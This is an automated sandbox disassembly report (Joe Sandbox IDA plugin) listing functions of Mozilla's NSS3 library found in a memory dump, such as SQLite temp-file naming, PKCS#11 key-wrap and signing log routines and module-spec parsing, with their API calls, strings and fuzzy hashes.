strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C67BE66), ref: 6C7B6ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C67BE66), ref: 6C7B6EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B6F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B6F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B6F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C67BE66), ref: 6C7B6FA6
sqlite3_snprintf.NSS3(?,00000000,6C81AAF9,00000000,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B6FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B6FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B6FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B7014
sqlite3_free.NSS3(00000000,?,?,?,?,6C67BE66), ref: 6C7B701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C67BE66), ref: 6C7B7030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C67BE66), ref: 6C7B7079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B7097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C67BE66), ref: 6C7B70A0

Strings

winGetTempname1, xrefs: 6C7B708F
mz_etilqs_, xrefs: 6C7B6F18
winGetTempname4, xrefs: 6C7B7046
winGetTempname5, xrefs: 6C7B7071
winGetTempname2, xrefs: 6C7B70C4

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 20d30249624f407c2214429bbcdec98b92428cb905a0e846b43df146a3baa85e
Instruction ID: bbe17326096d2341b3f290342b669a96cd52e6257cd766b39ef596431beaff0a
Opcode Fuzzy Hash: 20d30249624f407c2214429bbcdec98b92428cb905a0e846b43df146a3baa85e
Instruction Fuzzy Hash: E5517BB1A041112BE7145A309D99BBB36669F8230CF144538E915A7FC1FF35990EC2EB

Function 6C744FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000,00000000,00000001), ref: 6C745009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C745049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C74505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C745071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C745089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7450A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7450B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2), ref: 6C7450CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7450D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7450F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C745103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C745145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C745153
free.MOZGLUE(?), ref: 6C74516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C74517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C745195

Strings

nss=, xrefs: 6C745083
config=, xrefs: 6C74509B
library=, xrefs: 6C745043
parameters=, xrefs: 6C74506B
name=, xrefs: 6C745057

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: cc4b6d2ad1ae66067a4c7f76b3ab063d8aafeeeafb1ec1688b83c3bcf1a1a561
Instruction ID: 418f46bf5ec7aacd4bd82b996458749528feebe7a6e86f389136f42e770e0b64
Opcode Fuzzy Hash: cc4b6d2ad1ae66067a4c7f76b3ab063d8aafeeeafb1ec1688b83c3bcf1a1a561
Instruction Fuzzy Hash: C55108B5A01116ABEB50DF70EE45AAF37A8AF06288F144430EC19E7741E725E919C7F2

Function 6C718E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C718E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C718EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C718EB3

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C718EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C718EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C718F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C718F29
PR_LogPrint.NSS3(?,00000000), ref: 6C718F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C718F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C718F80
PR_LogPrint.NSS3(?,00000000), ref: 6C718F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C718FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C718FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C719047

Strings

pulWrappedKeyLen = 0x%p, xrefs: 6C718FC8
pMechanism = 0x%p, xrefs: 6C718EE0
(CK_INVALID_HANDLE), xrefs: 6C718EAC, 6C718F1F, 6C718F79
hWrappingKey = 0x%x, xrefs: 6C718F01, 6C718F11
hSession = 0x%x, xrefs: 6C718E8E, 6C718E9E
pWrappedKey = 0x%p, xrefs: 6C718FAD
hKey = 0x%x, xrefs: 6C718F5B, 6C718F6B
C_WrapKey, xrefs: 6C718E71
*pulWrappedKeyLen = 0x%x, xrefs: 6C719042

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: fa0a85077c8d0a3b5e2482d54d6d425364ef2eadd9673e95a56e8b0e17334475
Instruction ID: cc50129f233d0848dec1d418edd6ab8aebbb65d97ec35a4f1a9a8476cfc78e46
Opcode Fuzzy Hash: fa0a85077c8d0a3b5e2482d54d6d425364ef2eadd9673e95a56e8b0e17334475
Instruction Fuzzy Hash: 5951A13160A105EFDB20DF409E4CF9A7BBAAB4230DF098425F518A7F12D7349919DB96

Function 6C744C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C734F51,00000000), ref: 6C744C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C734F51,00000000), ref: 6C744C5B
PR_smprintf.NSS3(6C81AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C734F51,00000000), ref: 6C744C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C734F51,00000000), ref: 6C744CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C744CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C744CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C744D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C734F51,00000000), ref: 6C744D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C734F51,00000000), ref: 6C744D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C744D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C744DA2
free.MOZGLUE(?), ref: 6C744DB9
free.MOZGLUE(00000000), ref: 6C744DCF

Strings

every, xrefs: 6C744CA1
timeout, xrefs: 6C744C91
rust, xrefs: 6C744D22
any, xrefs: 6C744C96
%s,%s, xrefs: 6C744C4B
rootFlags, xrefs: 6C744D47
ootT, xrefs: 6C744D1A
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C744D9D
slotFlags, xrefs: 6C744D34
0x%08lx=[%s %s], xrefs: 6C744D80

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 10b23984b9417225d3551ff78aa4a338d5ef7d78eddb43fbf7e69b8d0172f1d7
Instruction ID: 0cb1c6524199c0ea11bfb215cf0c2c5809c47b320d7623fd70668401eff6368a
Opcode Fuzzy Hash: 10b23984b9417225d3551ff78aa4a338d5ef7d78eddb43fbf7e69b8d0172f1d7
Instruction Fuzzy Hash: 7E419EF190014667DB215F54DD466BB36B5AF9230CF488538EC1A4BB02E735D928EBD3

Function 6C726CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C726910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C726943
Part of subcall function 6C726910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C726957
Part of subcall function 6C726910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C726972
Part of subcall function 6C726910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C726983
Part of subcall function 6C726910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7269AA
Part of subcall function 6C726910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7269BE
Part of subcall function 6C726910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7269D2
Part of subcall function 6C726910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7269DF
Part of subcall function 6C726910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C726A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C726D8C
free.MOZGLUE(00000000), ref: 6C726DC5
free.MOZGLUE(?), ref: 6C726DD6
free.MOZGLUE(?), ref: 6C726DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C726E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C726E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C726E72
free.MOZGLUE(?), ref: 6C726EA7
free.MOZGLUE(?), ref: 6C726EC4
free.MOZGLUE(?), ref: 6C726ED5
free.MOZGLUE(00000000), ref: 6C726EE3
free.MOZGLUE(?), ref: 6C726EF4
free.MOZGLUE(?), ref: 6C726F08
free.MOZGLUE(00000000), ref: 6C726F35
free.MOZGLUE(?), ref: 6C726F44
free.MOZGLUE(?), ref: 6C726F5B
free.MOZGLUE(00000000), ref: 6C726F65

Part of subcall function 6C726C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C72781D,00000000,6C71BE2C,?,6C726B1D,?,?,?,?,00000000,00000000,6C72781D), ref: 6C726C40
Part of subcall function 6C726C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C72781D,?,6C71BE2C,?), ref: 6C726C58
Part of subcall function 6C726C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C72781D), ref: 6C726C6F
Part of subcall function 6C726C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C726C84
Part of subcall function 6C726C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C726C96
Part of subcall function 6C726C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C726CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C726F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C726FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C726FF4

Strings

+`sl, xrefs: 6C726D0D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`sl
API String ID: 1304971872-1589001029
Opcode ID: 52a0453eb1e578e7ebd438cf5c590be73a76d29ab32d36895c9eb95e08545fe5
Instruction ID: b52754b82238f85686ab7e161dd5ffc88f2b807d90f3ac8873a15ce3a4e7bd6f
Opcode Fuzzy Hash: 52a0453eb1e578e7ebd438cf5c590be73a76d29ab32d36895c9eb95e08545fe5
Instruction Fuzzy Hash: 23B1B3B0E012199FDF10DFA5DA85B9EBBB9BF04348F140136E814E7641E739EA14CBA1

Function 6C6EDDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6EDDDE

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C6EDDF5

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6EDE34
PR_Now.NSS3 ref: 6C6EDE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C6EDE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EDEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6EDEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6EDED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C6EDEF0
PR_smprintf.NSS3(6C81AAF9,(NULL) (Validity Unknown)), ref: 6C6EDF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6EDF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6EDF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6EDF33
free.MOZGLUE(00000000), ref: 6C6EDF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6EDF4B
free.MOZGLUE(00000000), ref: 6C6EDF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6EDF8E

Strings

(NULL) (Validity Unknown), xrefs: 6C6EDEFA
%s%s, xrefs: 6C6EDEEB
{???}, xrefs: 6C6EDE8B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: e8a7c7af34f3cb478c87a3dab08b126e12bfceb3018d7902921e756ff0a1d245
Instruction ID: f2cca18e15a4a065149e07896a1188169a0c891c507768f965207aabdf2ef3df
Opcode Fuzzy Hash: e8a7c7af34f3cb478c87a3dab08b126e12bfceb3018d7902921e756ff0a1d245
Instruction Fuzzy Hash: 2A51E2B1E05205ABDB10DE658D89AAF7AF4EF89358F144439EC09E7B00E730D915CBE6

Function 6C722D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C722DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C722E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C722E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C722E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C6F4F1C,?,-00000001,00000000,?), ref: 6C722E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C6F4F1C,?,-00000001,00000000), ref: 6C722E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C722EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C722EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C722EF8
PR_Unlock.NSS3(?), ref: 6C722F62
TlsGetValue.KERNEL32 ref: 6C722F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C722F9E
PR_Unlock.NSS3(?), ref: 6C722FCA
TlsGetValue.KERNEL32 ref: 6C72301A
EnterCriticalSection.KERNEL32(?), ref: 6C72302E
PR_Unlock.NSS3(?), ref: 6C723066
PR_SetError.NSS3(00000000,00000000), ref: 6C723085
PR_Unlock.NSS3(?), ref: 6C7230EC
TlsGetValue.KERNEL32 ref: 6C72310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C723124
PR_Unlock.NSS3(?), ref: 6C72314C

Part of subcall function 6C709180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C73379E,?,6C709568,00000000,?,6C73379E,?,00000001,?), ref: 6C70918D
Part of subcall function 6C709180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C73379E,?,6C709568,00000000,?,6C73379E,?,00000001,?), ref: 6C7091A0

Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07AD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07CD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07D6
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C66204A), ref: 6C6D07E4
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,6C66204A), ref: 6C6D0864
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6D0880
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C66204A), ref: 6C6D08CB
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08D7
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08FB

PR_SetError.NSS3(00000000,00000000), ref: 6C72316D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 295bb2fd09ee816efd8f8af5295e7a39e3c2245ae863609e48326a114e9a458b
Instruction ID: 2b436f878f04d85fbccf427576c8798ee8a22bf79e673c8c2f407be186856755
Opcode Fuzzy Hash: 295bb2fd09ee816efd8f8af5295e7a39e3c2245ae863609e48326a114e9a458b
Instruction Fuzzy Hash: DFF1BDB1D00609AFDF10EF64D988B9EBBB9BF09318F144169EC04A7711EB34E995CB91

Function 6C71AF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C71AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C71AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C71AF83

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C71AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C71AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C71AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C71AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C71B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C71B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C71B041

Strings

ulParameterLen = 0x%p, xrefs: 6C71AFD4
C_SignMessage, xrefs: 6C71AF41
pSignature = 0x%p, xrefs: 6C71B023
(CK_INVALID_HANDLE), xrefs: 6C71AF7C
pParameter = 0x%p, xrefs: 6C71AFB9
pData = 0x%p, xrefs: 6C71AFEF
hSession = 0x%x, xrefs: 6C71AF5E, 6C71AF6E
pulSignatureLen = 0x%p, xrefs: 6C71B03C
ulDataLen = %d, xrefs: 6C71B00A

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
